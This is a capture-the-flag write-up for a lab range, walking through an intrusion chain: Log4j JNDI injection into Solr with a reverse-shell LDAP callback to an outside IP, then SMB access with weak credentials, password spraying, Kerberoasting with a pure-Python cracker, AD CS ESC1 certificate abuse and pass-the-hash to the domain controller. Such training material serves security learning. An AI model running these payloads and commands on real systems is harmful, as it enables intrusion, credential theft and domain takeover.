春秋云境 - Certify (writeup)

flag01

A port scan of the entry host shows 8983 open.

有 solr 服务,第一个想到的肯定是 log4j

```
http://39.98.126.194:8983/solr/admin/collections?action=${jndi:ldap://5lpj8t5l.eyes.sh}
```

The DNS callback arrives, so it is exploitable. For the shell, use a JNDI server: GitHub - k4i-x3i0/jndiExploit-beta (a modified JNDIExploit that can inject a Behinder (冰蝎) direct-connect memory shell without changing the Behinder client).

Start the JNDI/LDAP server on the attacker's VPS (`-i` is its listening IP, elided as xxx), then point the lookup at it with the built-in reverse-shell gadget (the last two path segments are the callback IP and port):

```
java -jar JNDIExploit-beta.jar -i xxx
```

```
http://xxxx:8983/solr/admin/collections?action=${jndi:ldap://8.129.237.128:1389/Basic/ReverseShell/xxx/8083}
```
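As an added illustration (this is not code from the original writeup or from JNDIExploit), the following Python scans log lines for the JNDI lookup used above, including the URL-encoded and nested-lookup forms (`${${lower:j}ndi:…}`, `${::-j}ndi:…`) that a plain grep for `${jndi:` misses. It mimics what Log4j 2.x does to such strings: resolve inner lookups first, then look for the outer `${jndi:`. The sample log lines are constructed, modelled on a Solr request log and a front-end access log.

```python
import re
from urllib.parse import unquote

# Innermost ${...} lookup (no nested "${" inside). Log4j 2.x resolves these before the
# outer lookup, which is what attackers use to hide the literal string "jndi".
_INNER = re.compile(r"\$\{(?P<body>[^${}]*)\}")
# The outer lookup we actually care about: ${jndi:<scheme>://<host[:port]>...
_JNDI = re.compile(r"\$\{jndi:(?P<scheme>[a-z]+):/*(?P<target>[^/}\s]+)", re.IGNORECASE)


def _resolve_inner(body: str) -> str:
    """Evaluate the lookup forms an attacker can control without server-side state."""
    if ":-" in body:                      # ${x:-default} and ${::-j}: the default value wins
        return body.rsplit(":-", 1)[1]
    kind, _, arg = body.partition(":")
    if kind.lower() == "lower":
        return arg.lower()
    if kind.lower() == "upper":
        return arg.upper()
    return ""                             # env/sys/date/...: nothing attacker-controlled survives


def normalize(text: str, max_rounds: int = 16) -> str:
    """URL-decode, then collapse nested lookups until only a possible ${jndi:...} remains."""
    text = unquote(text)
    for _ in range(max_rounds):
        def repl(m):
            body = m.group("body")
            return m.group(0) if body.lower().startswith("jndi:") else _resolve_inner(body)
        new = _INNER.sub(repl, text)
        if new == text:
            break
        text = new
    return text


def scan_log(lines):
    """Return one hit per log line that still carries a JNDI lookup after normalisation."""
    hits = []
    for n, line in enumerate(lines, 1):
        m = _JNDI.search(normalize(line))
        if m:
            hits.append({"line": n, "scheme": m.group("scheme").lower(), "target": m.group("target")})
    return hits


# Constructed sample lines (not real logs from the range).
SAMPLE_LINES = [
    # Solr request log: Solr writes the decoded `action` parameter, so the payload reaches Log4j.
    "2025-03-12 20:30:01.123 INFO  (qtp1-14) [   ] o.a.s.s.HttpSolrCall [admin] webapp=null "
    "path=/admin/collections params={action=${jndi:ldap://5lpj8t5l.eyes.sh}} status=400 QTime=3",
    # Front-end access log: same payload URL-encoded and obfuscated with a nested ${lower:j} lookup.
    '10.0.0.5 - - [12/Mar/2025:20:31:07 +0800] "GET /solr/admin/collections?action='
    '%24%7B%24%7Blower%3Aj%7Dndi%3Aldap%3A//8.129.237.128%3A1389/Basic/ReverseShell/xxx/8083%7D HTTP/1.1" 400 -',
    # Benign line with a lookup-like string that is not a JNDI lookup.
    "2025-03-12 20:32:00.000 INFO  (qtp1-15) [   ] o.a.s.c.S.Request params={q=title:${lower:Solr}} status=0 QTime=1",
]

if __name__ == "__main__":
    for hit in scan_log(SAMPLE_LINES):
        print(hit)
```

The normaliser deliberately resolves only the lookup forms whose output the attacker fully controls (`lower`, `upper`, and the `:-` default syntax); anything depending on server state is treated as empty, which still exposes the `${jndi:` wrapper around it.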

Privilege escalation: run `sudo -l` on the shell, use the command the Solr user is allowed to run as root, and read flag01.

flag02

Scan the internal network from the compromised host (`-eh` excludes our own address):

```
./fscan -h 172.22.9.19/24 -eh 172.22.9.19
```
```
[2025-03-12 20:41:14] [SUCCESS] port open 172.22.9.7:80
[2025-03-12 20:41:14] [SUCCESS] port open 172.22.9.47:80
[2025-03-12 20:41:14] [SUCCESS] port open 172.22.9.47:139
[2025-03-12 20:41:14] [SUCCESS] port open 172.22.9.7:139
[2025-03-12 20:41:14] [SUCCESS] port open 172.22.9.7:88
[2025-03-12 20:41:14] [SUCCESS] port open 172.22.9.26:139
[2025-03-12 20:41:14] [SUCCESS] port open 172.22.9.47:22
[2025-03-12 20:41:14] [SUCCESS] port open 172.22.9.47:21
[2025-03-12 20:41:14] [SUCCESS] port open 172.22.9.26:445
[2025-03-12 20:41:14] [SUCCESS] port open 172.22.9.7:445
[2025-03-12 20:41:14] [SUCCESS] port open 172.22.9.7:389
[2025-03-12 20:41:14] [SUCCESS] port open 172.22.9.47:445
[2025-03-12 20:41:14] [SUCCESS] port open 172.22.9.7:135
[2025-03-12 20:41:14] [SUCCESS] port open 172.22.9.26:135
[2025-03-12 20:41:14] [SUCCESS] service 172.22.9.47:22 => [ssh] version:7.6p1 Ubuntu 4ubuntu0.7 product:OpenSSH os:Linux info:Ubuntu Linux; protocol 2.0 Banner:[SSH-2.0-OpenSSH_7.6p1 Ubuntu-4ubuntu0.7.]
[2025-03-12 20:41:15] [SUCCESS] service 172.22.9.47:21 => [ftp] version:3.0.3 product:vsftpd os:Unix Banner:[220 (vsFTPd 3.0.3).]
[2025-03-12 20:41:19] [SUCCESS] service 172.22.9.7:139 => Banner:[.]
[2025-03-12 20:41:19] [SUCCESS] service 172.22.9.7:88 =>
[2025-03-12 20:41:19] [SUCCESS] service 172.22.9.26:139 => Banner:[.]
[2025-03-12 20:41:19] [SUCCESS] service 172.22.9.7:80 => [http]
[2025-03-12 20:41:20] [SUCCESS] service 172.22.9.26:445 =>
[2025-03-12 20:41:20] [SUCCESS] service 172.22.9.7:445 =>
[2025-03-12 20:41:20] [SUCCESS] service 172.22.9.7:389 =>
[2025-03-12 20:41:20] [SUCCESS] service 172.22.9.47:80 => [http]
[2025-03-12 20:42:14] [SUCCESS] service 172.22.9.47:139 =>
[2025-03-12 20:42:15] [SUCCESS] service 172.22.9.47:445 =>
[2025-03-12 20:42:20] [SUCCESS] service 172.22.9.7:135 =>
[2025-03-12 20:42:20] [SUCCESS] service 172.22.9.26:135 =>
[2025-03-12 20:42:20] [INFO] open ports: 14
[2025-03-12 20:42:20] [INFO] starting vulnerability scan
[2025-03-12 20:42:20] [INFO] loaded plugins: findnet, ftp, ldap, ms17010, netbios, smb, smb2, smbghost, ssh, webpoc, webtitle
[2025-03-12 20:42:20] [SUCCESS] NetInfo result
target host: 172.22.9.26
hostname: DESKTOP-CBKTVMO
network interfaces:
IPv4 addresses:
└─ 172.22.9.26
[2025-03-12 20:42:20] [SUCCESS] NetInfo result
target host: 172.22.9.7
hostname: XIAORANG-DC
network interfaces:
IPv4 addresses:
└─ 172.22.9.7
[2025-03-12 20:42:20] [SUCCESS] NetBios 172.22.9.7 DC:XIAORANG\XIAORANG-DC
[2025-03-12 20:42:20] [SUCCESS] web title http://172.22.9.47 status:200 length:10918 title:Apache2 Ubuntu Default Page: It works
[2025-03-12 20:42:20] [SUCCESS] web title http://172.22.9.7 status:200 length:703 title:IIS Windows Server
[2025-03-12 20:42:20] [SUCCESS] NetBios 172.22.9.26 DESKTOP-CBKTVMO.xiaorang.lab Windows Server 2016 Datacenter 14393
[2025-03-12 20:42:20] [SUCCESS] SMB auth succeeded 172.22.9.47:445 administrator:123456
[2025-03-12 20:42:20] [INFO] OS info 172.22.9.47 [Windows 6.1]
[2025-03-12 20:42:20] [SUCCESS] NetBios 172.22.9.47 fileserver Windows 6.1
[2025-03-12 20:42:20] [INFO] SMB2 share info 172.22.9.47:445 administrator Pass:123456 shares:[print$ fileshare IPC$]
[2025-03-12 20:42:20] [SUCCESS] target: http://172.22.9.7:80
vuln type: poc-yaml-active-directory-certsrv-detect
vuln name:
details:
author:AgeloVito
links:https://www.cnblogs.com/EasonJim/p/6859345.html
```

Three hosts of interest: XIAORANG-DC (172.22.9.7, domain controller for xiaorang.lab; the certsrv detection shows it also hosts the AD CS web enrollment), DESKTOP-CBKTVMO (172.22.9.26, Windows Server 2016 domain member) and fileserver (172.22.9.47, Ubuntu with Samba, vsftpd and Apache). fscan already found working SMB credentials on the file server (administrator:123456), so connect to it directly and read flag02 from the `fileshare` share:

```
smbclient.py administrator:123456@172.22.9.47
shares
use fileshare
cd secret
cat flag02.txt
```

flag03 & flag04

While in the share, download the database that sits there as well:

```
get personnel.db
```

One table contains passwords and another contains e-mail addresses (i.e. usernames), so build users.txt and passwords.txt from them and start with a password spray against the domain. Spray one password per round across all users rather than many passwords per user, and check the domain lockout threshold first, or the spray locks out the accounts it is meant to find:

```
crackmapexec.exe smb 172.22.9.26 -u .\users.txt -p .\passwords.txt
```

The spray ends with one valid set of domain credentials:

```
xiaorang.lab\zhangjian:i9XDE02pLVf
```

The challenge description hinted at SPNs, so use this account to Kerberoast: request service tickets for every user account that has an SPN set and crack them offline.

Don't mix up the two Impacket scripts: GetUserSPNs.py is Kerberoasting (needs valid domain credentials, targets accounts with SPNs), while GetNPUsers.py is AS-REP roasting (targets accounts with Kerberos pre-authentication disabled).

```
GetUserSPNs.py -request -dc-ip 172.22.9.7 xiaorang.lab/zhangjian:i9XDE02pLVf
```

Two service accounts come back (hashes truncated):

```
$krb5tgs$23$*zhangxia$XIAORANG.LAB$xiaorang.lab/zhangxia*$92bad10671fac5c3238fdffa602123c8$...
$krb5tgs$23$*chenchen$XIAORANG.LAB$xiaorang.lab/chenchen*$18a70b4a838806fb79a7d51b27c1934c$...
```

Crack them with hashcat mode 13100 (Kerberos 5 TGS-REP etype 23, RC4-HMAC), which is the mode for the `$krb5tgs$23$` format:

```
hashcat -m 13100 hash.txt /usr/share/wordlists/rockyou.txt
```

```
XIAORANG\zhangxia:MyPass2@@6
XIAORANG\chenchen:@Passw0rd@
```
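To show what hashcat is actually doing with those `$krb5tgs$23$` lines, here is an added example (not from the writeup, nor Impacket or hashcat code) that implements the RC4-HMAC (etype 23) check in pure Python: derive the NT hash from a candidate password (MD4 over UTF-16LE), derive the RFC 4757 keys for key usage 2 (the ticket's enc-part), decrypt the blob and verify the HMAC-MD5 checksum. It also builds its own test vector, a constructed fake EncTicketPart encrypted under the password from the writeup, since the page's hashes are truncated. MD4 is implemented inline because OpenSSL 3 hides it behind the legacy provider.

```python
import hashlib
import hmac
import os
import struct
from typing import Optional

MASK = 0xFFFFFFFF
KEY_USAGE_TGS_REP_TICKET = 2   # RFC 4120: the ticket inside a TGS-REP is encrypted with usage 2


def md4(data: bytes) -> bytes:
    """Pure-Python MD4 (RFC 1320)."""
    def rotl(x, n):
        return ((x << n) | (x >> (32 - n))) & MASK
    F = lambda x, y, z: (x & y) | (~x & z)
    G = lambda x, y, z: (x & y) | (x & z) | (y & z)
    H = lambda x, y, z: x ^ y ^ z
    msg = data + b"\x80"
    msg += b"\x00" * ((56 - len(msg) % 64) % 64)
    msg += struct.pack("<Q", len(data) * 8)
    state = [0x67452301, 0xEFCDAB89, 0x98BADCFE, 0x10325476]
    rounds = (
        (F, 0x00000000, list(range(16)), (3, 7, 11, 19)),
        (G, 0x5A827999, [0, 4, 8, 12, 1, 5, 9, 13, 2, 6, 10, 14, 3, 7, 11, 15], (3, 5, 9, 13)),
        (H, 0x6ED9EBA1, [0, 8, 4, 12, 2, 10, 6, 14, 1, 9, 5, 13, 3, 11, 7, 15], (3, 9, 11, 15)),
    )
    for off in range(0, len(msg), 64):
        X = struct.unpack("<16I", msg[off:off + 64])
        v = state[:]
        for func, k, order, shifts in rounds:
            for i, idx in enumerate(order):
                r = (-i) % 4          # register updated this step cycles a, d, c, b
                x, y, z = v[(r + 1) % 4], v[(r + 2) % 4], v[(r + 3) % 4]
                v[r] = rotl((v[r] + func(x, y, z) + X[idx] + k) & MASK, shifts[i % 4])
        state = [(s + t) & MASK for s, t in zip(state, v)]
    return struct.pack("<4I", *state)


def nt_hash(password: str) -> bytes:
    """The RC4-HMAC Kerberos key is simply the NT hash: MD4(UTF-16LE(password))."""
    return md4(password.encode("utf-16-le"))


def hmac_md5(key: bytes, data: bytes) -> bytes:
    return hmac.new(key, data, hashlib.md5).digest()


def rc4(key: bytes, data: bytes) -> bytes:
    S = list(range(256))
    j = 0
    for i in range(256):
        j = (j + S[i] + key[i % len(key)]) & 0xFF
        S[i], S[j] = S[j], S[i]
    out, i, j = bytearray(), 0, 0
    for byte in data:
        i = (i + 1) & 0xFF
        j = (j + S[i]) & 0xFF
        S[i], S[j] = S[j], S[i]
        out.append(byte ^ S[(S[i] + S[j]) & 0xFF])
    return bytes(out)


def rc4_hmac_encrypt(key: bytes, usage: int, plaintext: bytes, confounder: Optional[bytes] = None) -> bytes:
    """RFC 4757 encryption: returns checksum || RC4(K3, confounder || plaintext)."""
    data = (confounder or os.urandom(8)) + plaintext
    k1 = hmac_md5(key, struct.pack("<I", usage))
    checksum = hmac_md5(k1, data)
    k3 = hmac_md5(k1, checksum)
    return checksum + rc4(k3, data)


def rc4_hmac_check(key: bytes, usage: int, checksum: bytes, edata: bytes) -> bool:
    """The cracker's inner loop: one HMAC to get K1, one to get K3, one RC4, one HMAC to verify."""
    k1 = hmac_md5(key, struct.pack("<I", usage))
    k3 = hmac_md5(k1, checksum)
    return hmac.compare_digest(hmac_md5(k1, rc4(k3, edata)), checksum)


def parse_krb5tgs(line: str) -> dict:
    """Parse Impacket's '$krb5tgs$23$*user$REALM$spn*$<checksum>$<edata>' output line."""
    if not line.startswith("$krb5tgs$23$*"):
        raise ValueError("only etype 23 (RC4-HMAC) lines are handled")
    ident, _, blob = line[len("$krb5tgs$23$*"):].partition("*$")
    user, realm, spn = ident.split("$", 2)
    checksum_hex, _, edata_hex = blob.partition("$")
    return {"user": user, "realm": realm, "spn": spn,
            "checksum": bytes.fromhex(checksum_hex), "edata": bytes.fromhex(edata_hex)}


def crack_krb5tgs(line: str, wordlist) -> Optional[str]:
    h = parse_krb5tgs(line)
    for pw in wordlist:
        if rc4_hmac_check(nt_hash(pw), KEY_USAGE_TGS_REP_TICKET, h["checksum"], h["edata"]):
            return pw
    return None


def make_sample_line(user: str, realm: str, spn: str, password: str) -> str:
    """Constructed test vector: a fake EncTicketPart (not real ASN.1) under the account's key."""
    fake_ticket = b"\x63\x82" + b"constructed EncTicketPart " * 4
    blob = rc4_hmac_encrypt(nt_hash(password), KEY_USAGE_TGS_REP_TICKET, fake_ticket, b"\x01" * 8)
    return f"$krb5tgs$23$*{user}${realm}${spn}*${blob[:16].hex()}${blob[16:].hex()}"


if __name__ == "__main__":
    sample = make_sample_line("zhangxia", "XIAORANG.LAB", "xiaorang.lab/zhangxia", "MyPass2@@6")
    print(crack_krb5tgs(sample, ["123456", "Password1", "MyPass2@@6"]))
```

The point this makes is why Kerberoasting works at all: the ticket is encrypted under a key derived directly from the service account's password with no salt and no key stretching, so every guess costs one MD4, three HMAC-MD5s and one RC4 pass, and the user's own TGS request is all that is needed to obtain the ciphertext. The defence is accordingly long random passwords on SPN accounts (or gMSAs) and AES-only service accounts, which at least replace the MD4-derived key with a PBKDF2-derived one.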

Neither of these accounts can read the flag under the administrator's profile, so the next step is certificates, as the range name suggests.

First enumerate AD CS (Active Directory Certificate Services) with Certipy.

Two gotchas: the user has to be given in UPN form (user@domain), and `-stdout` is required or the results only go to the output files and nothing is printed:

```
certipy find -u 'zhangxia@xiaorang.lab' -p 'MyPass2@@6' -dc-ip 172.22.9.7 -vulnerable -stdout
```

Certipy flags one template, XR Manager, as ESC1. ESC1 is a template that low-privileged users can enroll in, that lets the enrollee supply the subject alternative name (ENROLLEE_SUPPLIES_SUBJECT), that carries an EKU usable for client authentication, and that requires neither manager approval nor authorized signatures. Any domain user can therefore request a certificate carrying an arbitrary UPN, such as administrator@xiaorang.lab, and then authenticate as that account.

Reference: ADCS 攻击之证书模板配置错误 ESC1_此证书模板上的权限不允许当前用户注册此类型的证书-CSDN 博客 (ADCS attack, certificate template misconfiguration ESC1 / "the permissions on this certificate template do not allow the current user to enroll for this type of certificate", CSDN blog).
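As an added example (not from the writeup and not Certipy's code), the following Python evaluates the ESC1 conditions above against certificate-template attributes the way an auditor would after pulling them from LDAP. The flag bits and EKU OIDs are the real MS-CRTD values; the template dictionaries are constructed, and the attribute values given for "XR Manager" are an assumption about that template's configuration, not something the writeup shows. Enrollment rights, which live in the template's security descriptor, are modelled as a plain list of SIDs (`enroll_sids`).

```python
# Template attribute bits from MS-CRTD; only the ones ESC1 depends on.
CT_FLAG_ENROLLEE_SUPPLIES_SUBJECT = 0x00000001   # msPKI-Certificate-Name-Flag
CT_FLAG_SUBJECT_ALT_REQUIRE_UPN = 0x02000000     # msPKI-Certificate-Name-Flag (AD supplies the UPN)
CT_FLAG_PEND_ALL_REQUESTS = 0x00000002           # msPKI-Enrollment-Flag: CA manager approval

# EKUs that make the issued certificate usable for domain authentication (PKINIT / Schannel).
AUTH_EKUS = {
    "1.3.6.1.5.5.7.3.2",        # Client Authentication
    "1.3.6.1.5.2.3.4",          # PKINIT Client Authentication
    "1.3.6.1.4.1.311.20.2.2",   # Smart Card Logon
    "2.5.29.37.0",              # Any Purpose
}

EVERYONE, AUTHENTICATED_USERS = "S-1-1-0", "S-1-5-11"
DOMAIN_USERS_RID, DOMAIN_COMPUTERS_RID = "513", "515"


def is_low_privileged(sid: str) -> bool:
    """True for principals that every domain account (or computer) is a member of."""
    if sid in (EVERYONE, AUTHENTICATED_USERS):
        return True
    return sid.startswith("S-1-5-21-") and sid.rsplit("-", 1)[1] in (DOMAIN_USERS_RID, DOMAIN_COMPUTERS_RID)


def esc1_check(template: dict) -> dict:
    """Return which ESC1 preconditions hold; the template is ESC1 only if all of them do."""
    ekus = set(template.get("pKIExtendedKeyUsage", []))
    conditions = {
        "published_by_ca": bool(template.get("enabled")),
        "enrollee_supplies_subject": bool(template.get("msPKI-Certificate-Name-Flag", 0)
                                          & CT_FLAG_ENROLLEE_SUPPLIES_SUBJECT),
        "no_manager_approval": not (template.get("msPKI-Enrollment-Flag", 0) & CT_FLAG_PEND_ALL_REQUESTS),
        "no_authorized_signatures": template.get("msPKI-RA-Signature", 0) == 0,
        "auth_eku": not ekus or bool(ekus & AUTH_EKUS),   # an empty EKU list means "any purpose"
        "low_priv_can_enroll": any(is_low_privileged(s) for s in template.get("enroll_sids", [])),
    }
    blocked_by = [name for name, ok in conditions.items() if not ok]
    return {"template": template["name"], "vulnerable": not blocked_by, "blocked_by": blocked_by}


def audit(templates) -> list:
    """Names of the templates that satisfy every ESC1 condition."""
    return [r["template"] for r in map(esc1_check, templates) if r["vulnerable"]]


DOMAIN_SID = "S-1-5-21-1111111111-2222222222-3333333333"   # constructed domain SID

# Constructed templates. The 'XR Manager' values are an assumption about the writeup's template.
TEMPLATES = [
    {
        "name": "XR Manager", "enabled": True,
        "msPKI-Certificate-Name-Flag": CT_FLAG_ENROLLEE_SUPPLIES_SUBJECT,
        "msPKI-Enrollment-Flag": 0, "msPKI-RA-Signature": 0,
        "pKIExtendedKeyUsage": ["1.3.6.1.5.5.7.3.2"],
        "enroll_sids": [f"{DOMAIN_SID}-513"],            # Domain Users can enroll
    },
    {   # Built-in 'User' template: the UPN comes from AD, so the subject cannot be forged.
        "name": "User", "enabled": True,
        "msPKI-Certificate-Name-Flag": CT_FLAG_SUBJECT_ALT_REQUIRE_UPN,
        "msPKI-Enrollment-Flag": 0, "msPKI-RA-Signature": 0,
        "pKIExtendedKeyUsage": ["1.3.6.1.5.5.7.3.2"],
        "enroll_sids": [f"{DOMAIN_SID}-513"],
    },
    {   # Same template after the usual fix: requests go to a CA manager before issuance.
        "name": "XR Manager (manager approval)", "enabled": True,
        "msPKI-Certificate-Name-Flag": CT_FLAG_ENROLLEE_SUPPLIES_SUBJECT,
        "msPKI-Enrollment-Flag": CT_FLAG_PEND_ALL_REQUESTS, "msPKI-RA-Signature": 0,
        "pKIExtendedKeyUsage": ["1.3.6.1.5.5.7.3.2"],
        "enroll_sids": [f"{DOMAIN_SID}-513"],
    },
]

if __name__ == "__main__":
    for t in TEMPLATES:
        print(esc1_check(t))
```

Breaking any single condition is enough to remove ESC1: clear ENROLLEE_SUPPLIES_SUBJECT, require manager approval, require an authorized signature, drop the authentication EKUs, or remove the broad enrollment right. The hardened copy above shows the manager-approval variant.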

Before exploiting it, add the DC to the hosts file (for example, map XIAORANG-DC.xiaorang.lab and xiaorang.lab to 172.22.9.7) so that Kerberos name resolution works during the request.

Then use the XR Manager template to request a certificate for the domain administrator, supplying the target UPN in the SAN:

```
certipy req -u 'zhangxia@xiaorang.lab' -p 'MyPass2@@6' -target 172.22.9.7 -dc-ip 172.22.9.7 -ca "xiaorang-XIAORANG-DC-CA" -template 'XR Manager' -upn administrator@xiaorang.lab
```

The request may not go through on the first attempt; retry it a couple of times.

Authenticate with the resulting certificate (PKINIT) to obtain a TGT for the administrator; Certipy then recovers the account's NT hash from the PAC:

```
certipy auth -pfx .\administrator.pfx -dc-ip 172.22.9.7
```

```
'administrator@xiaorang.lab': aad3b435b51404eeaad3b435b51404ee:2f1b57eefb2d152196836b0516abea80
```

With the domain admin's NT hash, pass-the-hash with psexec.py to the member server and then the DC to collect flag03 and flag04 (`-codec gbk` keeps the Chinese console output readable):

```
psexec.py xiaorang/Administrator@172.22.9.26 -hashes :2f1b57eefb2d152196836b0516abea80 -codec gbk
```

```
psexec.py xiaorang/Administrator@172.22.9.7 -hashes :2f1b57eefb2d152196836b0516abea80 -codec gbk
```